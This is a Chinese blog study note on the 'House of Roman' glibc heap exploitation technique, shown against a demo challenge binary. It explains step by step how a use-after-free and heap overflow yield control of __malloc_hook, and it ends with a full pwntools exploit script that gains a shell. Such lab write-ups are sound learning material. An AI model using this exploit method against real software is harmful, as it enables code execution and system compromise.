house_of_roman

作者: zs0zrc | 来源:发表于2018-07-31 08:50 被阅读242次

    记录一下,防止以后忘了

    house_of_roman:
    该技术用于 bypass ALSR,利用12-bit 的爆破来达到获取shell的目的。且仅仅只需要一个 UAF 漏洞以及能创建任意大小的 chunk 的情况下就能完成利用

    house_of_roman的作者提供了一个demo作为展示
    利用大概分三个步骤:

    1. 将 FD 指向 malloc_hook
    2. 修正 0x71 的 Freelist
    3. 往 malloc_hook 写入 one gadget

    先分析下程序:
    程序开启了PIE和NX,一共有3个功能

    image.png

    程序存在UAF漏洞和堆溢出漏洞

    堆溢出:

    image.png

    UAF:

    image.png

    程序的大致情况了解了后,分析作者的利用过程
    我将作者的利用过程又细分了下

    1. 先分配3个chunk(0,1,2),大小分别为0x20,0xd0,0x70
    2. 用write_chunk功能在chunk2 + 0x68上设置fakesize 为0x61,用于后面的fastbins attack
    3. 将chunk1 free 掉后再分配,使得chunk1中包含main_arean+0x88的指针
    4. 然后分配3个大小为0x70的chunk(3,4,5),为后面做准备
    5. 通过堆溢出漏洞,将chunk1的size字段伪造为0x71,然后将chunk2,chunk3 free掉,通过UAF漏洞,将chunk3的fd指针最低位修改成0x20,将chunk1加入fastbins list中
    6. 将chunk1的fd修改成 __malloc_hook-0x23,之所以修改成__malloc_hook-0x23 ,是为了后面的fastbin dup, __malloc_hook - 0x23 + 0x8的地址上的值为0x7f
    7. 连续分配3个大小为0x70的chunk,就可以获得包含__malloc_hook的chunk,将这个chunk指针赋给chunk0
    8. free掉chunk4,通过uaf,将chunk4的FD修改为0,修复fastbins list
    9. 利用unsorted bins attack 向__malloc_hook写入main_arena+0x88
    10. 通过编辑功能,将__malloc_hook的低三个字节修改成one_gadget的偏移
    11. 最后连续free chunk5两次,通过malloc_printerr来出发malloc,getshell

    为了方便调试,我关掉了aslr

    • 设置fake_size
    fake = "A"*0x68
    fake += p64(0x61)  ## fake size
    edit(1,fake)
    
    image.png
    • free chunk1,使其包含main_arena+0x88的地址
    image.png

    *分配3个大小为0x70的chunk,修改chunk1的size字段为0x71

    create(0x65,3)  # chunk3 0x555555757170
    create(0x65,15) # chunk4 0x5555557571e0
    create(0x65,18) # chunk5 0x555555757250
    
    over = "A"*0x18  # off by one
    over += "\x71"  # set chunk  1's size --> 0x71
    edit(0,over)
    
    image.png
    • free掉chunk2,chunk3,通过uaf将chunk3的fd最低为修改为'\x20',将chunk1加入fastbins list中
    delete(2)
    delete(3)
    heap_po = "\x20"
    edit(3,heap_po)
    
    image.png
    • 利用write功能,将chunk1的fd指针最低两位修改成'\xed\x1a',即将fd修改为__malloc_hook - 0x23,这是为了利用fastbins dup 获得包含__malloc_hook的chunk, 原因上面说了,因为__malloc_hook - 0x23 +0x8地址的值为0x7f,可以绕过检测
    malloc_hook_nearly = "\xed\x1a" #__malloc_hook - 0x23 
    edit(1,malloc_hook_nearly)
    
    image.png
    • 连续分配三次大小为0x70的chunk,就可以获得包含__malloc_hook的chunk了
    image.png image.png
    • 利用 unsorted bin attack 向__malloc_hook中写入main_arena+0x88,使__malloc_hook中包含libc的地址
    create(0xc8,1)
    create(0xc8,1)
    create(0x18,2)
    create(0xc8,3)
    create(0xc8,4)
    delete(1)
    po = "B"*8
    po += "\x00\x1b" # 这个是__memalign_hook的最低两位,为了将bk修改为__malloc_hook - 0x10
    edit(1,po)
    create(0xc8,1)
    
    image.png
    • 通过修改chunk0,将__malloc_hook的低三位修改为one_gadget
    over = "R"*0x13   # padding for malloc_hook
    over += "\xa4\xd2\xaf"
    edit(0,over)
    

    此时 __malloc_hook附近的内容为下图,padding的计算是分配包含__malloc_hook的chunk的地址 减去 __malloc_hook的地址

    image.png image.png image.png
    • 最后通过连续free同一块chunk,通过malloc_printerr 来触发malloc getshell
    image.png

    exp:

    from pwn import*
    #context.log_level = 'debug'
    
    p = process('./new_chall')
    
    def create(size,idx):
        p.recv()
        p.sendline('1')
        p.recv()
        p.sendline(str(size))
        p.recv()
        p.sendline(str(idx))
    
    def edit(idx,content):
        p.recv()
        p.sendline('2')
        p.recv()
        p.sendline(str(idx))
        p.recv()
        p.send(content)
    
    def delete(idx):
        p.recv()
        p.sendline('3')
        p.recv()
        p.sendline(str(idx))
    
    p.recvuntil(":")
    p.sendline("zs0zrc")
    
    create(0x18,0) # chunk0 0x20
    create(0xc8,1) # chunk1 d0 0x555555757030   
    create(0x65,2) # chunk2 0x70 0x555555757100
    
    fake = "A"*0x68
    fake += p64(0x61)  ## fake size
    edit(1,fake)
    log.info('edit chunk 1 to fake')
    
    delete(1)
    create(0xc8,1)
    
    create(0x65,3)  # chunk3 0x555555757170
    create(0x65,15) # chunk4 0x5555557571e0
    create(0x65,18) # chunk5 0x555555757250
    
    over = "A"*0x18  # off by one
    over += "\x71"  # set chunk  1's size --> 0x71
    edit(0,over)
    log.info('set chunk  1 size --> 0x71')
    
    delete(2)
    delete(3)
    heap_po = "\x20"
    edit(3,heap_po)
    log.info('ADD b to fastbins list')
    
    # malloc_hook-->[0x7ffff7dd1b10]
    malloc_hook_nearly = "\xed\x1a" #__malloc_hook - 0x23 
    edit(1,malloc_hook_nearly)
    log.info("change B fd ")
    
    create(0x65,0)
    create(0x65,0)
    create(0x65,0) #malloc a chunk include malloc_hook
    
    delete(15)
    edit(15,p64(0))#fix fastbins list
    log.info('fix fastbins list')
    
    create(0xc8,1)
    create(0xc8,1)
    create(0x18,2)
    create(0xc8,3)
    create(0xc8,4)
    delete(1)
    po = "B"*8
    po += "\x00\x1b"
    edit(1,po)
    create(0xc8,1)
    log.info('use unsortbins attack change malloc_hook to main_arena + 0x88')
    
    over = "R"*0x13   # padding for malloc_hook
    over += "\xa4\xd2\xaf"
    edit(0,over)
    
    delete(18)
    delete(18)
    p.interactive()
    

    相关文章

      网友评论

        本文标题:house_of_roman

        本文链接:https://www.haomeiwen.com/subject/pjmqvftx.html